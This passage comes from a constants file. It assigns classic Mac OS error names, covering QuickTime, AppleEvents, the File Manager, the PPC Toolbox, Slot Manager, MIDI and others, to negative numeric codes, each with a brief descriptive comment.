nrNotSlotDeviceErr = -2542 #nrNotSlotDeviceErr
nrNameErr = -2541 #nrNameErr
nrNotCreatedErr = -2540 #nrNotCreatedErr
nrNotFoundErr = -2539 #nrNotFoundErr
nrInvalidNodeErr = -2538 #nrInvalidNodeErr
nrNotEnoughMemoryErr = -2537 #nrNotEnoughMemoryErr
nrLockedErr = -2536 #nrLockedErr
mmInternalError = -2526 #mmInternalError
tsmDefaultIsNotInputMethodErr = -2524 #Current Input source is KCHR or uchr, not Input Method (GetDefaultInputMethod)
tsmNoStem = -2523 #No stem exists for the token
tsmNoMoreTokens = -2522 #No more tokens are available for the source text
tsmNoHandler = -2521 #No Callback Handler exists for callback
tsmInvalidContext = -2520 #Invalid TSMContext specified in call
tsmUnknownErr = -2519 #any other errors
tsmUnsupportedTypeErr = -2518 #unSupported interface type error
tsmScriptHasNoIMErr = -2517 #script has no imput method or is using old IM
tsmInputMethodIsOldErr = -2516 #returned by GetDefaultInputMethod
tsmComponentAlreadyOpenErr = -2515 #text service already opened for the document
tsmTSNotOpenErr = -2514 #text service is not open
tsmTSHasNoMenuErr = -2513 #the text service has no menu
tsmUseInputWindowErr = -2512 #not TSM aware because we are using input window
tsmDocumentOpenErr = -2511 #there are open documents
tsmTextServiceNotFoundErr = -2510 #no text service found
tsmCantOpenComponentErr = -2509 #canÕt open the component
tsmNoOpenTSErr = -2508 #no open text service
tsmDocNotActiveErr = -2507 #document is NOT active
tsmTSMDocBusyErr = -2506 #document is still active
tsmInvalidDocIDErr = -2505 #invalid TSM documentation id
tsmNeverRegisteredErr = -2504 #app never registered error (not TSM aware)
tsmAlreadyRegisteredErr = -2503 #want to register again error
tsmNotAnAppErr = -2502 #not an application error
tsmInputMethodNotFoundErr = -2501 #tsmInputMethodNotFoundErr
tsmUnsupScriptLanguageErr = -2500 #tsmUnsupScriptLanguageErr
kernelUnrecoverableErr = -2499 #kernelUnrecoverableErr
kernelReturnValueErr = -2422 #kernelReturnValueErr
kernelAlreadyFreeErr = -2421 #kernelAlreadyFreeErr
kernelIDErr = -2419 #kernelIDErr
kernelExceptionErr = -2418 #kernelExceptionErr
kernelTerminatedErr = -2417 #kernelTerminatedErr
kernelInUseErr = -2416 #kernelInUseErr
kernelTimeoutErr = -2415 #kernelTimeoutErr
kernelAsyncReceiveLimitErr = -2414 #kernelAsyncReceiveLimitErr
kernelAsyncSendLimitErr = -2413 #kernelAsyncSendLimitErr
kernelAttributeErr = -2412 #kernelAttributeErr
kernelExecutionLevelErr = -2411 #kernelExecutionLevelErr
kernelDeletePermissionErr = -2410 #kernelDeletePermissionErr
kernelExecutePermissionErr = -2409 #kernelExecutePermissionErr
kernelReadPermissionErr = -2408 #kernelReadPermissionErr
kernelWritePermissionErr = -2407 #kernelWritePermissionErr
kernelObjectExistsErr = -2406 #kernelObjectExistsErr
kernelUnsupportedErr = -2405 #kernelUnsupportedErr
kernelPrivilegeErr = -2404 #kernelPrivilegeErr
kernelOptionsErr = -2403 #kernelOptionsErr
kernelCanceledErr = -2402 #kernelCanceledErr
kernelIncompleteErr = -2401 #kernelIncompleteErr
badCallOrderErr = -2209 #Usually due to a status call being called prior to being setup first
noDMAErr = -2208 #CanÕt do DMA digitizing (i.e. can't go to requested dest
badDepthErr = -2207 #CanÕt digitize into this depth
notExactSizeErr = -2206 #CanÕt do exact size requested
noMoreKeyColorsErr = -2205 #all key indexes in use
notExactMatrixErr = -2204 #warning of bad matrix, digitizer did its best
matrixErr = -2203 #bad matrix, digitizer did nothing
qtParamErr = -2202 #bad input parameter (out of range, etc)
digiUnimpErr = -2201 #feature unimplemented
qtXMLApplicationErr = -2159 #qtXMLApplicationErr
qtXMLParseErr = -2158 #qtXMLParseErr
qtActionNotHandledErr = -2157 #qtActionNotHandledErr
notEnoughDataErr = -2149 #notEnoughDataErr
urlDataHFTPURLErr = -2148 #urlDataHFTPURLErr
urlDataHFTPServerDisconnectedErr = -2147 #urlDataHFTPServerDisconnectedErr
urlDataHFTPNoPasswordErr = -2146 #urlDataHFTPNoPasswordErr
urlDataHFTPNeedPasswordErr = -2145 #urlDataHFTPNeedPasswordErr
urlDataHFTPBadNameListErr = -2144 #urlDataHFTPBadNameListErr
urlDataHFTPNoNetDriverErr = -2143 #urlDataHFTPNoNetDriverErr
urlDataHFTPFilenameErr = -2142 #urlDataHFTPFilenameErr
urlDataHFTPPermissionsErr = -2141 #urlDataHFTPPermissionsErr
urlDataHFTPQuotaErr = -2140 #urlDataHFTPQuotaErr
urlDataHFTPNoDirectoryErr = -2139 #urlDataHFTPNoDirectoryErr
urlDataHFTPDataConnectionErr = -2138 #urlDataHFTPDataConnectionErr
urlDataHFTPServerErr = -2137 #urlDataHFTPServerErr
urlDataHFTPBadPasswordErr = -2136 #urlDataHFTPBadPasswordErr
urlDataHFTPBadUserErr = -2135 #urlDataHFTPBadUserErr
urlDataHFTPShutdownErr = -2134 #urlDataHFTPShutdownErr
urlDataHFTPProtocolErr = -2133 #urlDataHFTPProtocolErr
urlDataHHTTPRedirectErr = -2132 #urlDataHHTTPRedirectErr
urlDataHHTTPURLErr = -2131 #urlDataHHTTPURLErr
urlDataHHTTPNoNetDriverErr = -2130 #urlDataHHTTPNoNetDriverErr
urlDataHHTTPProtocolErr = -2129 #urlDataHHTTPProtocolErr
qtNetworkAlreadyAllocatedErr = -2127 #qtNetworkAlreadyAllocatedErr
notAllowedToSaveMovieErr = -2126 #notAllowedToSaveMovieErr
fileOffsetTooBigErr = -2125 #fileOffsetTooBigErr
ASDEntryNotFoundErr = -2124 #ASDEntryNotFoundErr
ASDBadForkErr = -2123 #ASDBadForkErr
ASDBadHeaderErr = -2122 #ASDBadHeaderErr
AAPNotFoundErr = -2121 #AAPNotFoundErr
AAPNotCreatedErr = -2120 #AAPNotCreatedErr
qfcbNotCreatedErr = -2119 #qfcbNotCreatedErr
qfcbNotFoundErr = -2118 #qfcbNotFoundErr
wackBadMetaDataErr = -2117 #wackBadMetaDataErr
wackForkNotFoundErr = -2116 #wackForkNotFoundErr
wackBadFileErr = -2115 #wackBadFileErr
unknownFormatErr = -2114 #unknownFormatErr
pathNotVerifiedErr = -2113 #pathNotVerifiedErr
noPathMappingErr = -2112 #noPathMappingErr
emptyPathErr = -2111 #emptyPathErr
pathTooLongErr = -2110 #pathTooLongErr
cannotBeLeafAtomErr = -2109 #cannotBeLeafAtomErr
invalidAtomTypeErr = -2108 #invalidAtomTypeErr
invalidAtomContainerErr = -2107 #invalidAtomContainerErr
invalidAtomErr = -2106 #invalidAtomErr
duplicateAtomTypeAndIDErr = -2105 #duplicateAtomTypeAndIDErr
atomIndexInvalidErr = -2104 #atomIndexInvalidErr
atomsNotOfSameTypeErr = -2103 #atomsNotOfSameTypeErr
notLeafAtomErr = -2102 #notLeafAtomErr
cannotFindAtomErr = -2101 #cannotFindAtomErr
unsupportedProcessorErr = -2097 #unsupportedProcessorErr
unsupportedOSErr = -2096 #unsupportedOSErr
qtmlUninitialized = -2095 #qtmlUninitialized
qtmlDllEntryNotFoundErr = -2094 #Windows specific errors (when qtml is loading)
qtmlDllLoadErr = -2093 #Windows specific errors (when qtml is loading)
componentDllEntryNotFoundErr = -2092 #Windows specific errors (when component is loading)
componentDllLoadErr = -2091 #Windows specific errors (when component is loading)
videoOutputInUseErr = -2090 #videoOutputInUseErr
noExportProcAvailableErr = -2089 #noExportProcAvailableErr
tuneParseOSErr = -2087 #tuneParseOSErr
tunePlayerFullOSErr = -2086 #tunePlayerFullOSErr
noteChannelNotAllocatedOSErr = -2085 #noteChannelNotAllocatedOSErr
illegalNoteChannelOSErr = -2084 #illegalNoteChannelOSErr
synthesizerOSErr = -2083 #synthesizerOSErr
synthesizerNotRespondingOSErr = -2082 #synthesizerNotRespondingOSErr
midiManagerAbsentOSErr = -2081 #midiManagerAbsentOSErr
illegalControllerOSErr = -2080 #illegalControllerOSErr
illegalInstrumentOSErr = -2079 #illegalInstrumentOSErr
illegalKnobValueOSErr = -2078 #illegalKnobValueOSErr
illegalKnobOSErr = -2077 #illegalKnobOSErr
illegalChannelOSErr = -2076 #illegalChannelOSErr
illegalPartOSErr = -2075 #illegalPartOSErr
illegalVoiceAllocationOSErr = -2074 #illegalVoiceAllocationOSErr
cantReceiveFromSynthesizerOSErr = -2073 #cantReceiveFromSynthesizerOSErr
cantSendToSynthesizerOSErr = -2072 #cantSendToSynthesizerOSErr
notImplementedMusicOSErr = -2071 #notImplementedMusicOSErr
internalComponentErr = -2070 #internalComponentErr
invalidSpriteIDErr = -2069 #invalidSpriteIDErr
invalidImageIndexErr = -2068 #invalidImageIndexErr
invalidSpriteIndexErr = -2067 #invalidSpriteIndexErr
gWorldsNotSameDepthAndSizeErr = -2066 #gWorldsNotSameDepthAndSizeErr
invalidSpritePropertyErr = -2065 #invalidSpritePropertyErr
invalidSpriteWorldPropertyErr = -2064 #invalidSpriteWorldPropertyErr
missingRequiredParameterErr = -2063 #missingRequiredParameterErr
movieTextNotFoundErr = -2062 #movieTextNotFoundErr
sourceNotFoundErr = -2061 #sourceNotFoundErr
noSourceTreeFoundErr = -2060 #noSourceTreeFoundErr
samplesAlreadyInMediaErr = -2059 #samplesAlreadyInMediaErr
auxiliaryExportDataUnavailable = -2058 #auxiliaryExportDataUnavailable
unsupportedAuxiliaryImportData = -2057 #unsupportedAuxiliaryImportData
soundSupportNotAvailableErr = -2056 #QT for Windows error
noSoundTrackInMovieErr = -2055 #QT for Windows error
noVideoTrackInMovieErr = -2054 #QT for Windows error
featureUnsupported = -2053 #featureUnsupported
couldNotUseAnExistingSample = -2052 #couldNotUseAnExistingSample
noDefaultDataRef = -2051 #noDefaultDataRef
badDataRefIndex = -2050 #badDataRefIndex
invalidDataRefContainer = -2049 #invalidDataRefContainer
noMovieFound = -2048 #noMovieFound
dataNoDataRef = -2047 #dataNoDataRef
endOfDataReached = -2046 #endOfDataReached
dataAlreadyClosed = -2045 #dataAlreadyClosed
dataAlreadyOpenForWrite = -2044 #dataAlreadyOpenForWrite
dataNotOpenForWrite = -2043 #dataNotOpenForWrite
dataNotOpenForRead = -2042 #dataNotOpenForRead
invalidSampleDescription = -2041 #invalidSampleDescription
invalidChunkCache = -2040 #invalidChunkCache
invalidSampleDescIndex = -2039 #invalidSampleDescIndex
invalidChunkNum = -2038 #invalidChunkNum
invalidSampleNum = -2037 #invalidSampleNum
invalidRect = -2036 #invalidRect
cantEnableTrack = -2035 #cantEnableTrack
internalQuickTimeError = -2034 #internalQuickTimeError
badEditIndex = -2033 #badEditIndex
timeNotInMedia = -2032 #timeNotInMedia
timeNotInTrack = -2031 #timeNotInTrack
trackNotInMovie = -2030 #trackNotInMovie
trackIDNotFound = -2029 #trackIDNotFound
badTrackIndex = -2028 #badTrackIndex
maxSizeToGrowTooSmall = -2027 #maxSizeToGrowTooSmall
userDataItemNotFound = -2026 #userDataItemNotFound
staleEditState = -2025 #staleEditState
nonMatchingEditState = -2024 #nonMatchingEditState
invalidEditState = -2023 #invalidEditState
cantCreateSingleForkFile = -2022 #happens when file already exists
wfFileNotFound = -2021 #wfFileNotFound
movieToolboxUninitialized = -2020 #movieToolboxUninitialized
progressProcAborted = -2019 #progressProcAborted
mediaTypesDontMatch = -2018 #mediaTypesDontMatch
badEditList = -2017 #badEditList
cantPutPublicMovieAtom = -2016 #cantPutPublicMovieAtom
invalidTime = -2015 #invalidTime
invalidDuration = -2014 #invalidDuration
invalidHandler = -2013 #invalidHandler
invalidDataRef = -2012 #invalidDataRef
invalidSampleTable = -2011 #invalidSampleTable
invalidMovie = -2010 #invalidMovie
invalidTrack = -2009 #invalidTrack
invalidMedia = -2008 #invalidMedia
noDataHandler = -2007 #noDataHandler
noMediaHandler = -2006 #noMediaHandler
badComponentType = -2005 #badComponentType
cantOpenHandler = -2004 #cantOpenHandler
cantFindHandler = -2003 #cantFindHandler
badPublicMovieAtom = -2002 #badPublicMovieAtom
badImageDescription = -2001 #badImageDescription
couldNotResolveDataRef = -2000 #couldNotResolveDataRef
nonDragOriginatorErr = -1862 #illegal attempt at originator only data
badImageErr = -1861 #bad translucent image PixMap
badImageRgnErr = -1860 #bad translucent image region
noSuitableDisplaysErr = -1859 #no displays support translucency
unsupportedForPlatformErr = -1858 #call is for PowerPC only
dragNotAcceptedErr = -1857 #drag was not accepted by receiver
handlerNotFoundErr = -1856 #handler not found
duplicateHandlerErr = -1855 #handler already exists
cantGetFlavorErr = -1854 #error while trying to get flavor data
duplicateFlavorErr = -1853 #flavor type already exists
badDragFlavorErr = -1852 #unknown flavor type
badDragItemErr = -1851 #unknown drag item reference
badDragRefErr = -1850 #unknown drag reference
errEndOfBody = -1813 #errEndOfBody
errEndOfDocument = -1812 #errEndOfDocument
errTopOfBody = -1811 #errTopOfBody
errTopOfDocument = -1810 #errTopOfDocument
errOffsetIsOutsideOfView = -1801 #errOffsetIsOutsideOfView
errOffsetInvalid = -1800 #errOffsetInvalid
errOSACantOpenComponent = -1762 #Can't connect to scripting system with that ID
errOSAComponentMismatch = -1761 #Parameters are from 2 different components
errOSADataFormatTooNew = -1759 #errOSADataFormatTooNew
errOSADataFormatObsolete = -1758 #errOSADataFormatObsolete
errOSANoSuchDialect = -1757 #errOSANoSuchDialect
errOSASourceNotAvailable = -1756 #errOSASourceNotAvailable
errOSABadSelector = -1754 #errOSABadSelector
errOSAScriptError = -1753 #errOSAScriptError
errOSABadStorageType = -1752 #errOSABadStorageType
errOSAInvalidID = -1751 #errOSAInvalidID
errOSASystemError = -1750 #errOSASystemError
errAEBufferTooSmall = -1741 #buffer for AEFlattenDesc too small
errAEBuildSyntaxError = -1740 #AEBuildDesc and friends detected a syntax error
errAEDescIsNull = -1739 #attempting to perform an invalid operation on a null descriptor
errAEStreamAlreadyConverted = -1738 #attempt to convert a stream that has already been converted
errAEStreamBadNesting = -1737 #nesting violation while streaming
errAEDuplicateHandler = -1736 #attempt to install handler in table for identical class and id (1.1 or greater)
errAEEventFiltered = -1735 #event has been filtered, and should not be propogated (1.1 or greater)
errAEReceiveEscapeCurrent = -1734 #break out of only lowest level of AEReceive (1.1 or greater)
errAEReceiveTerminate = -1733 #break out of all levels of AEReceive to the topmost (1.1 or greater)
errAERecordingIsAlreadyOn = -1732 #available only in version 1.0.1 or greater
errAEUnknownObjectType = -1731 #available only in version 1.0.1 or greater
errAEEmptyListContainer = -1730 #Attempt to pass empty list as container to accessor
errAENegativeCount = -1729 #CountProc returned negative value
errAENoSuchObject = -1728 #e.g.,: specifier asked for the 3rd, but there are only 2. Basically, this indicates a run-time resolution error.
errAENotAnObjSpec = -1727 #Param to AEResolve not of type 'obj '
errAEBadTestKey = -1726 #Test is neither typeLogicalDescriptor nor typeCompDescriptor
errAENoSuchLogical = -1725 #Something other than AND, OR, or NOT
errAEAccessorNotFound = -1723 #Accessor proc matching wantClass and containerType or wildcards not found
errAEWrongNumberArgs = -1721 #Logical op kAENOT used with other than 1 term
errAEImpossibleRange = -1720 #A range like 3rd to 2nd, or 1st to all.
errAEIllegalIndex = -1719 #index is out of range in a put operation
errAEReplyNotArrived = -1718 #the contents of the reply you are accessing have not arrived yet
errAEHandlerNotFound = -1717 #no handler in the dispatch tables fits the parameters to AEGetEventHandler or AEGetCoercionHandler
errAEUnknownAddressType = -1716 #the target address type is not known
errAEParamMissed = -1715 #a required parameter was not accessed
errAENotASpecialFunction = -1714 #there is no special function for/with this keyword
errAENoUserInteraction = -1713 #no user interaction is allowed
errAETimeout = -1712 #the AppleEvent timed out
errAEWaitCanceled = -1711 #in AESend, the user cancelled out of wait loop for reply or receipt
errAEUnknownSendMode = -1710 #mode wasn't NoReply, WaitReply, or QueueReply or Interaction level is unknown
errAEReplyNotValid = -1709 #AEResetTimer was passed an invalid reply parameter
errAEEventNotHandled = -1708 #the AppleEvent was not handled by any handler
errAENotAppleEvent = -1707 #the event is not in AppleEvent format
errAENewerVersion = -1706 #need newer version of the AppleEvent manager
errAEBadListItem = -1705 #the specified list item does not exist
errAENotAEDesc = -1704 #errAENotAEDesc
errAEWrongDataType = -1703 #errAEWrongDataType
errAECorruptData = -1702 #errAECorruptData
errAEDescNotFound = -1701 #errAEDescNotFound
errAECoercionFail = -1700 #bad parameter data or unable to coerce the data supplied
errFSIteratorNotSupported = -1424 #The iterator's flags or container are not supported by this call
errFSIteratorNotFound = -1423 #Passed FSIterator is not an open iterator
errFSBadIteratorFlags = -1422 #Flags passed to FSOpenIterator are bad
errFSForkExists = -1421 #Named fork already exists.
errFSRefsDifferent = -1420 #FSCompareFSRefs; refs are for different objects
errFSBadSearchParams = -1419 #Something wrong with CatalogSearch searchParams
errFSBadItemCount = -1418 #maximumItems was zero
errFSNoMoreItems = -1417 #Iteration ran out of items to return
errFSBadAllocFlags = -1413 #Invalid bits set in allocationFlags
errFSBadPosMode = -1412 #Newline bits set in positionMode
errFSMissingName = -1411 #A Unicode name parameter was NULL or nameLength parameter was zero
errFSNameTooLong = -1410 #File/fork name is too long to create/rename
errFSForkNotFound = -1409 #Named fork does not exist
errFSNotAFolder = -1407 #Expected a folder, got a file
errFSMissingCatInfo = -1406 #A CatalogInfo parameter was NULL
errFSBadInfoBitmap = -1405 #A CatalogInfoBitmap or VolumeInfoBitmap has reserved or invalid bits set
errFSBadForkRef = -1404 #A ForkRefNum parameter was bad
errFSBadBuffer = -1403 #A buffer parameter was bad
errFSBadForkName = -1402 #Fork name parameter is bad
errFSBadFSRef = -1401 #FSRef parameter is bad
errFSUnknownCall = -1400 #selector is not recognized by this filesystem
badFCBErr = -1327 #FCBRecPtr is not valid
volVMBusyErr = -1311 #can't eject because volume is in use by VM
fsDataTooBigErr = -1310 #file or volume is too big for system
fileBoundsErr = -1309 #file's EOF, offset, mark or size is too big
notARemountErr = -1308 #when _Mount allows only remounts and doesn't get one
badFidErr = -1307 #file id is dangling or doesn't match with the file number
sameFileErr = -1306 #can't exchange a file with itself
desktopDamagedErr = -1305 #desktop database files are corrupted
catChangedErr = -1304 #the catalog has been modified
diffVolErr = -1303 #files on different volumes
notAFileErr = -1302 #directory specified
fidExists = -1301 #file id already exists
fidNotFound = -1300 #no file thread exists.
errRefNum = -1280 #bad connection refNum
errAborted = -1279 #control call was aborted
errState = -1278 #bad connection state for this operation
errOpening = -1277 #open connection request failed
errAttention = -1276 #attention message too long
errFwdReset = -1275 #read terminated by forward reset
errDSPQueueSize = -1274 #DSP Read/Write Queue Too small
errOpenDenied = -1273 #open connection request was denied
reqAborted = -1105 #reqAborted
noDataArea = -1104 #noDataArea
noSendResp = -1103 #noSendResp
cbNotFound = -1102 #cbNotFound
noRelErr = -1101 #noRelErr
badBuffNum = -1100 #badBuffNum
badATPSkt = -1099 #badATPSkt
tooManySkts = -1098 #tooManySkts
tooManyReqs = -1097 #tooManyReqs
reqFailed = -1096 #reqFailed
aspNoAck = -1075 #No ack on attention request (server err)
aspTooMany = -1074 #Too many clients (server error)
aspSizeErr = -1073 #Command block too big
aspSessClosed = -1072 #Session closed
aspServerBusy = -1071 #Server cannot open another session
aspParamErr = -1070 #Parameter error
aspNoServers = -1069 #No servers at that address
aspNoMoreSess = -1068 #No more sessions on server
aspBufTooSmall = -1067 #Buffer too small
aspBadVersNum = -1066 #Server cannot support this ASP version
nbpNISErr = -1029 #Error trying to open the NIS
nbpNotFound = -1028 #Name not found on remove
nbpDuplicate = -1027 #Duplicate name exists already
nbpConfDiff = -1026 #Name confirmed at different socket
nbpNoConfirm = -1025 #nbpNoConfirm
nbpBuffOvr = -1024 #Buffer overflow in LookupName
noMaskFoundErr = -1000 #Icon Utilties Error
kFMFontContainerAccessErr = -985 #kFMFontContainerAccessErr
kFMFontTableAccessErr = -984 #kFMFontTableAccessErr
kFMIterationScopeModifiedErr = -983 #kFMIterationScopeModifiedErr
kFMInvalidFontErr = -982 #kFMInvalidFontErr
kFMInvalidFontFamilyErr = -981 #kFMInvalidFontFamilyErr
kFMIterationCompleted = -980 #kFMIterationCompleted
guestNotAllowedErr = -932 #destination port requires authentication
badLocNameErr = -931 #location name malformed
badServiceMethodErr = -930 #illegal service type, or not supported
noUserRecErr = -928 #Invalid user reference number
authFailErr = -927 #unable to authenticate user at destination
noInformErr = -926 #PPCStart failed because destination did not have inform pending
networkErr = -925 #An error has occurred in the network, not too likely
noUserRefErr = -924 #unable to create a new userRefNum
notLoggedInErr = -923 #The default userRefNum does not yet exist
noDefaultUserErr = -922 #user hasn't typed in owners name in Network Setup Control Pannel
badPortNameErr = -919 #PPCPortRec malformed
sessClosedErr = -917 #session was closed
portClosedErr = -916 #port was closed
noResponseErr = -915 #unable to contact destination
noToolboxNameErr = -914 #A system resource is missing, not too likely
noMachineNameErr = -913 #user hasn't named his Macintosh in the Network Setup Control Panel
userRejectErr = -912 #Destination rejected the session request
noUserNameErr = -911 #user name unknown on destination machine
portNameExistsErr = -910 #port is already open (perhaps in another app)
badReqErr = -909 #bad parameter or invalid state for operation
noSessionErr = -908 #Invalid session reference number
sessTableErr = -907 #Out of session tables, try again later
destPortErr = -906 #Port does not exist at destination
localOnlyErr = -905 #Network activity is currently disabled
noGlobalsErr = -904 #The system is hosed, better re-boot
noPortErr = -903 #Unable to open port or bad portRefNum. If you're calling
nameTypeErr = -902 #Invalid or inappropriate locationKindSelector in locationName
notInitErr = -900 #PPCToolBox not initialized
notAppropriateForClassic = -877 #This application won't or shouldn't run on Classic (Problem 2481058).
appVersionTooOld = -876 #The application's creator and version are incompatible with the current version of Mac OS.
wrongApplicationPlatform = -875 #The application could not launch because the required platform is not available
hmCloseViewActive = -863 #Returned from HMRemoveBalloon if CloseView was active
hmNoBalloonUp = -862 #Returned from HMRemoveBalloon if no balloon was visible when call was made
hmOperationUnsupported = -861 #Returned from HMShowBalloon call if bad method passed to routine
hmUnknownHelpType = -859 #Returned if help msg record contained a bad type
hmWrongVersion = -858 #Returned if help mgr resource was the wrong version
hmSkippedBalloon = -857 #Returned from calls if helpmsg specified a skip balloon
hmHelpManagerNotInited = -855 #Returned from HMGetHelpMenuHandle if help menu not setup
hmSameAsLastBalloon = -854 #Returned from HMShowMenuBalloon if menu & item is same as last time
hmBalloonAborted = -853 #Returned if mouse was moving or mouse wasn't in window port rect
hmHelpDisabled = -850 #Show Balloons mode was off, call to routine ignored
rcDBPackNotInited = -813 #attempt to call other routine before InitDBPack
rcDBWrongVersion = -812 #incompatible versions
rcDBNoHandler = -811 #no app handler for specified data type
rcDBBadAsyncPB = -810 #tried to kill a bad pb
rcDBAsyncNotSupp = -809 #ddev does not support async calls
rcDBBadDDEV = -808 #bad ddev specified on DBInit
rcDBBadSessNum = -807 #bad session number for DBGetConnInfo
rcDBBadSessID = -806 #rcDBBadSessID
rcDBExec = -805 #rcDBExec
rcDBBreak = -804 #rcDBBreak
rcDBBadType = -803 #rcDBBadType
rcDBError = -802 #rcDBError
rcDBValue = -801 #rcDBValue
rcDBNull = -800 #rcDBNull
icTooManyProfilesErr = -677 #too many profiles in database
icProfileNotFoundErr = -676 #profile not found
icConfigInappropriateErr = -675 #incorrect manufacturer code
icConfigNotFoundErr = -674 #no internet configuration was found
icNoURLErr = -673 #no URL found
icNothingToOverrideErr = -672 #no component for the override component to capture
icNoMoreWritersErr = -671 #you cannot begin a write session because someone else is already doing it
icTruncatedErr = -670 #more data was present than was returned
icInternalErr = -669 #Internet Config internal error
icPrefDataErr = -668 #problem with preference data
icPermErr = -667 #cannot set preference
icPrefNotFoundErr = -666 #Internet preference not found
vmInvalidOwningProcessErr = -648 #current process does not own the BackingFileID or FileViewID
vmAddressNotInFileViewErr = -647 #address is not in a FileView
vmNoMoreFileViewsErr = -646 #no more FileViews were found
vmFileViewAccessErr = -645 #requested FileViewAccess cannot be obtained
vmInvalidFileViewIDErr = -644 #invalid FileViewID
vmNoMoreBackingFilesErr = -643 #no more BackingFiles were found
vmBusyBackingFileErr = -642 #open views found on BackingFile
vmMappingPrivilegesErr = -641 #requested MappingPrivileges cannot be obtained
vmInvalidBackingFileIDErr = -640 #invalid BackingFileID
noMMUErr = -626 #no MMU present
cannotDeferErr = -625 #unable to defer additional functions
interruptsMaskedErr = -624 #donÕt call with interrupts masked
notLockedErr = -623 #specified range of memory is not locked
cannotMakeContiguousErr = -622 #cannot make specified range contiguous
notHeldErr = -621 #specified range of memory is not held
notEnoughMemoryErr = -620 #insufficient physical memory
threadProtocolErr = -619 #threadProtocolErr
threadNotFoundErr = -618 #threadNotFoundErr
threadTooManyReqsErr = -617 #threadTooManyReqsErr
noUserInteractionAllowed = -610 #no user interaction allowed
connectionInvalid = -609 #connectionInvalid
noOutstandingHLE = -608 #noOutstandingHLE
bufferIsSmall = -607 #error returns from Post and Accept
appIsDaemon = -606 #app is BG-only, and launch flags disallow this
appMemFullErr = -605 #application SIZE not big enough for launch
hardwareConfigErr = -604 #hardware configuration not correct for call
protocolErr = -603 #app made module calls in improper order
appModeErr = -602 #memory mode is 32-bit, but app not 32-bit clean
memFragErr = -601 #not enough room to launch app w/special requirements
procNotFound = -600 #no eligible process with specified descriptor
driverHardwareGoneErr = -503 #disk driver's hardware was disconnected
hwParamErr = -502 #bad selector for _HWPriv
teScrapSizeErr = -501 #scrap item too big for text edit record
rgnTooBigErr = -500 #rgnTooBigErr
exUserBreak = -492 #user debugger break; execute debugger commands on stack
strUserBreak = -491 #user debugger break; display string on stack
userBreak = -490 #user debugger break
notThePublisherWrn = -463 #not the first registered publisher for that container
containerAlreadyOpenWrn = -462 #container already opened by this section
containerNotFoundWrn = -461 #could not find editionContainer at this time
multiplePublisherWrn = -460 #A Publisher is already registered for that container
badSubPartErr = -454 #can not use sub parts in this release
badEditionFileErr = -453 #edition file is corrupt
notRegisteredSectionErr = -452 #not a registered SectionRecord
badSectionErr = -451 #not a valid SectionRecord
editionMgrInitErr = -450 #edition manager not inited by this app
fsmUnknownFSMMessageErr = -438 #unknown message passed to FSM
fsmNoAlternateStackErr = -437 #no alternate stack for HFS CI
fsmBadFSDVersionErr = -436 #FSM version incompatible with FSD
fsmDuplicateFSIDErr = -435 #FSID already exists on InstallFS
fsmBadFSDLenErr = -434 #FSD size incompatible with current FSM vers
fsmBadFFSNameErr = -433 #Name length not 1 <= length <= 31
fsmBusyFFSErr = -432 #File system is busy, cannot be removed
fsmFFSNotFoundErr = -431 #Foreign File system does not exist - new Pack2 could return this error too
btKeyAttrErr = -417 #There is no such a key attribute.
btKeyLenErr = -416 #Maximum key length is too long or equal to zero.
btRecNotFnd = -415 #Record cannot be found.
btDupRecErr = -414 #Record already exists.
btNoSpace = -413 #Can't allocate disk space.
notBTree = -410 #The file is not a dictionary.
gcrOnMFMErr = -400 #gcr format on high density media error
slotNumErr = -360 #invalid slot # error
smRecNotFnd = -351 #Record not found in the SRT.
smSRTOvrFlErr = -350 #SRT over flow.
smNoGoodOpens = -349 #No opens were successfull in the loop.
smOffsetErr = -348 #Offset was too big (temporary error
smByteLanesErr = -347 #NumByteLanes was determined to be zero.
smBadsPtrErr = -346 #Bad pointer was passed to sCalcsPointer
smsGetDrvrErr = -345 #Error occurred during _sGetDriver.
smNoMoresRsrcs = -344 #No more sResources
smDisDrvrNamErr = -343 #Error occurred during _sDisDrvrName.
smGetDrvrNamErr = -342 #Error occurred during _sGetDrvrName.
smCkStatusErr = -341 #Status of slot = fail.
smBlkMoveErr = -340 #_BlockMove error
smNewPErr = -339 #_NewPtr error
smSelOOBErr = -338 #Selector out of bounds error
smSlotOOBErr = -337 #Slot out of bounds error
smNilsBlockErr = -336 #Nil sBlock error (Dont allocate and try to use a nil sBlock)
smsPointerNil = -335 #LPointer is nil From sOffsetData. If this error occurs; check sInfo rec for more information.
smCPUErr = -334 #Code revision is wrong
smCodeRevErr = -333 #Code revision is wrong
smReservedErr = -332 #Reserved field not zero
smBadsList = -331 #Bad sList: Id1 < Id2 < Id3 ...format is not followed.
smBadRefId = -330 #Reference Id not found in List
smBusErrTO = -320 #BusError time out.
smBadBoardId = -319 #BoardId was wrong; re-init the PRAM record.
smReservedSlot = -318 #slot is reserved, VM should not use this address space.
smInitTblVErr = -317 #An error occurred while trying to initialize the Slot Resource Table.
smInitStatVErr = -316 #The InitStatusV field was negative after primary or secondary init.
smNoBoardId = -315 #No Board Id.
smGetPRErr = -314 #Error occurred during _sGetPRAMRec (See SIMStatus).
smNoBoardSRsrc = -313 #No Board sResource.
smDisposePErr = -312 #_DisposePointer error
smFHBlkDispErr = -311 #Error occurred during _sDisposePtr (Dispose of FHeader block).
smFHBlockRdErr = -310 #Error occurred during _sGetFHeader.
smBLFieldBad = -309 #ByteLanes field was bad.
smUnExBusErr = -308 #Unexpected BusError
smResrvErr = -307 #Fatal reserved error. Reserved field != 0.
smNosInfoArray = -306 #No sInfoArray. Memory Mgr error.
smDisabledSlot = -305 #This slot is disabled (-305 use to be smLWTstBad)
smNoDir = -304 #Directory offset is Nil
smRevisionErr = -303 #Wrong revison level
smFormatErr = -302 #FHeader Format is not Apple's
smCRCFail = -301 #CRC check failed for declaration data
smEmptySlot = -300 #No card in slot
nmTypErr = -299 #Notification Manager:wrong queue type
smPriInitErr = -293 #Error; Cards could not be initialized.
smPRAMInitErr = -292 #Error; Slot Resource Table could not be initialized.
smSRTInitErr = -291 #Error; Slot Resource Table could not be initialized.
smSDMInitErr = -290 #Error; SDM could not be initialized.
midiInvalidCmdErr = -261 #command not supported for port type
midiDupIDErr = -260 #duplicate client ID
midiNameLenErr = -259 #name supplied is longer than 31 characters
midiWriteErr = -258 #MIDIWritePacket couldn't write to all connected ports
midiNoConErr = -257 #no connection exists between specified ports
midiVConnectRmvd = -256 #pending virtual connection removed
midiVConnectMade = -255 #pending virtual connection resolved
midiVConnectErr = -254 #pending virtual connection created
midiTooManyConsErr = -253 #too many connections made
